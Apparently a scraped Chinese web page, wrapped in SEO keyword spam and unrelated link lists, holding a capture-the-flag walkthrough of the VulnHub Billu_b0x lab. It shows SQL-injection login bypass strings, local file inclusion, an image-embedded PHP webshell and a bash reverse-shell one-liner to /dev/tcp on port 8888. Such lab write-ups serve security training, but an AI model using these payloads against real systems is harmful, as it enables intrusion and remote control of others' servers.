当前位置: 首页 > wzjs >正文

点击即玩的小游戏网站购物app平台有哪些

点击即玩的小游戏网站,购物app平台有哪些,wap网站制作动态,网站建设与管理的未来规划方案靶场下载链接 https://download.vulnhub.com/billu/Billu_b0x.zip 将kali和Billu,NAT连接 获取靶场ip arp-scan -l 使用diesearch进行目录扫描 dirsearch -u " " 查看目录中的信息 打开add.php 打开head.php 打开in,phpinfo()的信息泄露 允许本地文件包含 打开i…

靶场下载链接

https://download.vulnhub.com/billu/Billu_b0x.zip

 将kali和Billu,NAT连接

获取靶场ip

arp-scan -l

 使用diesearch进行目录扫描

dirsearch  -u "  "

 查看目录中的信息

打开add.php

 打开head.php

 打开in,phpinfo()的信息泄露

允许本地文件包含 

 打开index.php,登录界面,尝试使用万能密码登录(失败)

' or 1=1# 

 打开phpmy

 打开test.php

使用get请求失败 

在kali,使用post请求成功 

 

存在文件包含漏洞和文件下载漏洞

使用此请求方式查看一下index.php

发现了登录的逻辑,明白了为什么万能密码会错误

只要在万能密码的后面加一个\就可以了

打开images,图片上传位置

登录 

' or 1=1#\ 

成功登录 

show users 显示用户信息,重点有图片 

获取到图片上传的路径 

右键点击图片,选择在新标签中打开图像

 add 添加用户,上传图片

 图片马

 新建1.php文件写入一句话木马

 随便下载一个图片,放在一起

copy 1.png/b + 1.php/a 2.png

将制作好的图片马上传上去 

图片马地址http://192.168.31.138/uploaded_images/2.png 

 制作反弹shell木马文件

show users 点击continue时进行抓包

echo "bash -i >& /dev/tcp/192.168.31.138/8888 0>&1" | bash

将load改为图片马位置,在panel.php后放代码 

在kali中监听8888端口

发送到重放器,点击发送,kali中可监听到shell,反弹shell完成

http://www.dtcms.com/wzjs/793404.html

相关文章:

  • 网站建设的卖点公司网站开发费用入什么科目
  • 国外营销网站网站怎么适配移动端
  • 启迪网站建设招聘重庆网领网站建设公司
  • jquery特效网站南昌高端模板建站
  • 公司网站怎么备案广告制作费
  • 个人主题网站设计论文河南龙王建设集团网站
  • 做网站服务器要用多大温州知名网站
  • adsl做网站wordpress主题nova
  • 怎样低成本做网站推广网站自助制作
  • 怎么在国税网站上做实名认证吗wordpress嵌入百度地图可以导航
  • 网站规划和建设方案软件开发和编程的区别
  • 有哪些网站可以做视频网页设计实验报告单模板
  • 奉贤宜昌网站建设简述it外包的作用
  • 房地产网站建设意义山西传染病最新消息今天
  • 四川建设网站免费空间域名注册免备案
  • 网站建设制作培训wordpress php版本太低
  • 网站备案审核需要多久信誉好的做网站
  • 给公司网站设计wordpress登录后才能进入某分类
  • 龙岩网站建设推广什么网站做新产品代理
  • 长宁品牌网站建设wordpress com cn
  • 网站群怎么做电脑网页视频下载
  • 正规的公司网站建设如何做网站内容架构分析
  • 大型门户网站设计网站开发收
  • 阿里云建站百度收录吗郑州锐途网站建设
  • 公司架设网站费用怎么做分录hao123网址导航
  • 做网站的价格表网站ico图标放在哪里
  • 客户管理系统网站模板下载网站运营代理
  • 能免费做婚礼邀请函的网站邯郸做小程序公司
  • 怎么建网站快捷方式ppt制作模板与素材免费下载
  • 唐山哪里做网站自行建网站 所需费用